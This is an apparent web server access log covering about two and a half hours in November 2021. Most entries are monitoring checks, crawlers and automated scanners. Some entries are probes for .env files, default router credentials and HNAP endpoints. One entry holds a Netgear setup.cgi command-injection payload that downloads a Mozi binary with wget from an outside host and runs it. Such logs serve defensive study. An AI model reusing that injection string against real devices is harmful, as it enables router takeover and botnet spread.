134.209.127.39 - - [06/Nov/2021:23:03:55 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:04:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.62.185 - - [06/Nov/2021:23:05:22 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Nov/2021:23:05:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.173 - - [06/Nov/2021:23:05:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
45.83.65.69 - - [06/Nov/2021:23:06:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
45.83.67.227 - - [06/Nov/2021:23:06:14 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
180.149.125.168 - - [06/Nov/2021:23:06:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:23:06:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.131.22.48 - - [06/Nov/2021:23:06:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
178.239.21.195 - - [06/Nov/2021:23:07:30 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [06/Nov/2021:23:07:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.80.184.107 - - [06/Nov/2021:23:08:08 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [06/Nov/2021:23:08:10 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.239.21.195 - - [06/Nov/2021:23:08:16 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
178.239.21.195 - - [06/Nov/2021:23:08:35 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [06/Nov/2021:23:08:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.171 - - [06/Nov/2021:23:09:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
193.3.19.243 - - [06/Nov/2021:23:09:11 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:09:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.239.21.195 - - [06/Nov/2021:23:09:51 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
178.239.21.195 - - [06/Nov/2021:23:10:03 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [06/Nov/2021:23:10:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.186.19.235 - - [06/Nov/2021:23:10:58 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4"
222.186.19.235 - - [06/Nov/2021:23:10:58 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16"
222.186.19.235 - - [06/Nov/2021:23:10:58 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:11:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.239.21.195 - - [06/Nov/2021:23:11:56 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
39.77.54.164 - - [06/Nov/2021:23:12:25 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:12:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.124.100 - - [06/Nov/2021:23:12:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
178.239.21.195 - - [06/Nov/2021:23:13:03 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
205.185.124.100 - - [06/Nov/2021:23:13:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Nov/2021:23:13:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.62.185 - - [06/Nov/2021:23:13:52 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
178.239.21.195 - - [06/Nov/2021:23:14:09 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [06/Nov/2021:23:14:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:15:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.86.245.22 - - [06/Nov/2021:23:15:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
178.239.21.195 - - [06/Nov/2021:23:16:00 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
212.91.246.72 - - [06/Nov/2021:23:16:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:17:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:18:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.70.127 - - [06/Nov/2021:23:19:22 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [06/Nov/2021:23:19:22 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
209.141.56.209 - - [06/Nov/2021:23:19:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [06/Nov/2021:23:19:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.46.255.252 - - [06/Nov/2021:23:19:52 +0100] "GET http://ipinfo.io HTTP/1.1" 400 329 "-" "gbrmss/7.29.0"
212.91.246.72 - - [06/Nov/2021:23:20:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:21:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:22:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.173 - - [06/Nov/2021:23:22:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:23:23:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:24:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:25:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:26:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:27:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:28:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:29:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:30:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.168 - - [06/Nov/2021:23:31:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:23:31:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:32:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:33:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:34:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:35:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:36:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:37:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.227.201.107 - - [06/Nov/2021:23:38:34 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
165.227.201.107 - - [06/Nov/2021:23:38:34 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:38:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:39:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.80.184.107 - - [06/Nov/2021:23:40:16 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [06/Nov/2021:23:40:18 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:23:40:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:41:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:42:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.222.253.6 - - [06/Nov/2021:23:43:11 +0100] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.249 - - [06/Nov/2021:23:43:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.91.246.72 - - [06/Nov/2021:23:43:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.80.184.107 - - [06/Nov/2021:23:44:10 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [06/Nov/2021:23:44:10 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [06/Nov/2021:23:44:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:45:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:46:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:47:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:48:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.148.179 - - [06/Nov/2021:23:49:22 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
192.241.148.179 - - [06/Nov/2021:23:49:22 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
222.186.19.235 - - [06/Nov/2021:23:49:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [06/Nov/2021:23:49:27 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0"
222.186.19.235 - - [06/Nov/2021:23:49:27 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 7.1.1; 4A Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043906 Mobile Safari/537.36 V1_AND_SQ_7.5.0_794_YYB_D QQ/7.5.0.3430 NetType/WIFI WebP/0.3.0 Pixel/720"
212.91.246.72 - - [06/Nov/2021:23:49:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:50:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:51:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:52:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:53:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:54:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:55:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.151.113 - - [06/Nov/2021:23:55:49 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
137.184.151.113 - - [06/Nov/2021:23:55:49 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:56:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:57:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Nov/2021:23:58:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.3.19.243 - - [06/Nov/2021:23:58:39 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [06/Nov/2021:23:59:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.149.125.162 - - [07/Nov/2021:00:00:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
222.186.19.235 - - [07/Nov/2021:00:01:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
222.186.19.235 - - [07/Nov/2021:00:01:04 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.17 Safari/537.11"
222.186.19.235 - - [07/Nov/2021:00:01:04 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0"
139.162.200.241 - - [07/Nov/2021:00:01:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
193.118.53.210 - - [07/Nov/2021:00:02:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
191.10.114.113 - - [07/Nov/2021:00:07:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
179.97.228.62 - - [07/Nov/2021:00:17:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
205.185.124.100 - - [07/Nov/2021:00:18:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.46.255.252 - - [07/Nov/2021:00:19:10 +0100] "GET http://ipinfo.io HTTP/1.1" 400 329 "-" "gbrmss/7.29.0"
193.3.19.243 - - [07/Nov/2021:00:19:37 +0100] "\x03" 501 316 "-" "-"
45.80.184.107 - - [07/Nov/2021:00:27:58 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [07/Nov/2021:00:27:58 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
180.149.125.163 - - [07/Nov/2021:00:30:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
128.14.133.58 - - [07/Nov/2021:00:33:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
157.230.216.203 - - [07/Nov/2021:00:40:43 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [07/Nov/2021:00:40:43 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
180.149.125.168 - - [07/Nov/2021:00:44:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
209.141.56.209 - - [07/Nov/2021:00:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
209.141.62.185 - - [07/Nov/2021:00:46:55 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
88.80.189.57 - - [07/Nov/2021:00:47:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
76.80.0.178 - - [07/Nov/2021:00:49:24 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
183.17.64.213 - - [07/Nov/2021:00:50:01 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://183.17.64.213:34010/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
209.141.56.209 - - [07/Nov/2021:00:51:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
60.211.253.218 - - [07/Nov/2021:00:53:39 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
60.211.253.218 - - [07/Nov/2021:00:53:40 +0100] "GET /Portal0000.htm HTTP/1.1" 404 319 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
60.211.253.218 - - [07/Nov/2021:00:53:40 +0100] "GET /__Additional HTTP/1.1" 404 317 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
60.211.253.218 - - [07/Nov/2021:00:53:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
35.195.93.98 - - [07/Nov/2021:00:54:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
88.214.57.235 - - [07/Nov/2021:00:55:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
88.214.57.235 - - [07/Nov/2021:00:55:18 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
180.149.125.162 - - [07/Nov/2021:00:55:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
209.141.56.209 - - [07/Nov/2021:00:57:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
128.14.134.134 - - [07/Nov/2021:00:57:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
20.115.114.27 - - [07/Nov/2021:00:58:28 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.80.184.107 - - [07/Nov/2021:00:59:36 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.80.184.107 - - [07/Nov/2021:00:59:37 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
130.211.54.158 - - [07/Nov/2021:01:01:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
154.209.125.21 - - [07/Nov/2021:01:03:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
180.149.125.172 - - [07/Nov/2021:01:06:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
180.149.125.162 - - [07/Nov/2021:01:10:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
185.142.236.40 - - [07/Nov/2021:01:15:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.40 - - [07/Nov/2021:01:15:56 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.40 - - [07/Nov/2021:01:15:56 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.40 - - [07/Nov/2021:01:15:56 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.40 - - [07/Nov/2021:01:15:57 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
188.43.201.109 - - [07/Nov/2021:01:16:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
45.80.184.107 - - [07/Nov/2021:01:18:05 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.80.184.107 - - [07/Nov/2021:01:18:05 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
34.140.248.32 - - [07/Nov/2021:01:19:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
35.233.62.116 - - [07/Nov/2021:01:22:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.26.0"
